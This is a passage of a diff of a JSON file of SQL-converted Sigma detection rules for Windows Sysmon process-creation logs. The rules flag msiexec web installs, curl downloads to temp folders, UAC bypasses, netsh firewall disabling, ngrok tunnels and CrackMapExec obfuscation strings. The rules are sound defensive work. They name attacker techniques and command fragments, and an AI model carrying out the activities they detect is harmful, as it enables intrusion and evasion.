(Nextron Systems)", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "status": "test", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.defense_evasion", - "attack.t1218", "attack.t1105" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network 
interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious IIS native-code module installations via command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the executiob of 
TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": 
"02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], "falsepositives": [ - "Legitimate use of the library" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": 
"cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. 
Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the addition of a new rule to the 
Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password 
protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + 
"attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "status": "experimental", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + 
"False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
